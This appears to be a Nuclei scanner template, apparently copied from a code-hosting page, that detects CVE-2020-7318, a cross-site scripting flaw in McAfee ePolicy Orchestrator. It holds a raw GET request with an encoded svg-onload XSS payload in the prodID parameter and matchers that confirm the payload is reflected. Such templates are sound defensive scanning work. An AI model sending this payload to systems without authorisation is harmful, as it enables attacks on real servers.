46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2020-7318
|
|
|
|
info:
|
|
name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
|
|
author: dwisiswant0
|
|
severity: medium
|
|
description: |
|
|
McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
|
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-7318
|
|
reference:
|
|
- https://kc.mcafee.com/corporate/index?page=content&id=SB10332
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2020-7318
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2020,xss,mcafee
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
- type: word
|
|
words:
|
|
- "Policy Name"
|
|
- "'\"><svg/onload=alert(document.domain)>"
|
|
condition: and
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/08/15
|